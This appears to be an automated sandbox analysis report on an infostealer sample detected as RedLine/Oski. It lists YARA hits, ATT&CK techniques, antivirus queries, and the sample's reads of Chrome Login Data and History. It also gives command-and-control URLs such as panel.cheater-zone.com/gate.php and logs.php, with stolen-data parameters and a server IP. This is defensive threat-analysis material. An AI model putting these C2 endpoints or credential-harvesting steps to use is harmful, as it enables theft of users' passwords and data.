Source: C:\Users\user\AppData\Local\Temp\Zip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Zip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Zip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Zip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Queries volume information: C:\Users\user\AppData\Local\Temp\update_232309.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Queries volume information: C:\Users\user\AppData\Local\Temp\update_232309.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 5VXh2VBmA0.exe, type: SAMPLE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match File source: 5VXh2VBmA0.exe, type: SAMPLE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 5VXh2VBmA0.exe, type: SAMPLE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 21 Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 131 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Source | Detection | Scanner | Label
5VXh2VBmA0.exe | 81% | ReversingLabs | ByteCode-MSIL.Trojan.RedLineStealer
5VXh2VBmA0.exe | 61% | Virustotal |
5VXh2VBmA0.exe | 100% | Avira | TR/Redcap.vxffz
5VXh2VBmA0.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Zip.exe | 100% | Avira | TR/Redcap.vxffz
C:\Users\user\AppData\Local\Temp\Zip.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\Zip.exe | 77% | ReversingLabs | ByteCode-MSIL.Trojan.Oskistelaer

Source | Detection | Scanner | Label
0.0.5VXh2VBmA0.exe.760000.0.unpack | 100% | Avira | TR/Redcap.vxffz

No Antivirus matches

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://support.google. | 0% | URL Reputation | safe
http://ip-api.comx | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://panel.cheater-zone.com | 0% | Avira URL Cloud | safe
http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 | 0% | Avira URL Cloud | safe
http://panel.cheater-zone.com8 | 0% | Avira URL Cloud | safe
http://panel.cheater-zone.com/task.php?hwid=CH65FCCAB88D | 0% | Avira URL Cloud | safe
http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFil | 0% | Avira URL Cloud | safe
http://ip-api.com8 | 0% | Avira URL Cloud | safe
https://gomorrah.pw | 0% | Avira URL Cloud | safe
http://panel.cheater-zone.com/gate.php?hwid=CH65FCCAB88D | 0% | Avira URL Cloud | safe
http://panel.cheater-zone.comx | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
panel.cheater-zone.com | 92.249.45.113 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/json/ | false | | high
http://panel.cheater-zone.com/task.php?hwid=CH65FCCAB88D | true | Avira URL Cloud: safe | unknown
http://panel.cheater-zone.com/gate.php?hwid=CH65FCCAB88D | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google | 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://search.yahoo.com?fr=crmas_sfpf | 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.google.com/chrome?p=update_errorFix | 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com8 | Zip.exe, 0000000A.00000002.375551818.00000176E61FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/answer/6315198?product= | 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.dr | false | | high
http://www.sajatypeworks.com | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://panel.cheater-zone.com8 | 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro | 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.dr | false | | high
https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows | 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.dr | false | | high
http://panel.cheater-zone.com | 5VXh2VBmA0.exe | false | Avira URL Cloud: safe | unknown
https://www.google.com/intl/en_uk/chrome/ | 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.dr | false | | high
http://ip-api.com | 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000003145000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61F0000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome?p=update_error | 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.dr | false | | high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E6121000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.sakkal.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://gomorrah.pw5VXh2VBmA0.exe, info.txt.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFil5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.google.com/intl/en_uk/chrome/Google5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.apache.org/licenses/LICENSE-2.05VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                                      high
                                                                      https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317F000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.google.com/instal5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.google.com/chrome?p=upda5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.google.5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ip-api.comx5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://james.newtonking.com/projects/jsonNewtonsoft.Json.dll.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.carterandcone.coml5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://support.google.com/installer/?product=5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                                                    high
                                                                                    https://ac.ecosia.org/autocomplete?q=5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://search.yahoo.com?fr=crmas_sfp5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.fontbureau.com/designers/cabarga.htmlN5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.founder.com.cn/cn5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers/frere-jones.html5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://panel.cheater-zone.comx5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
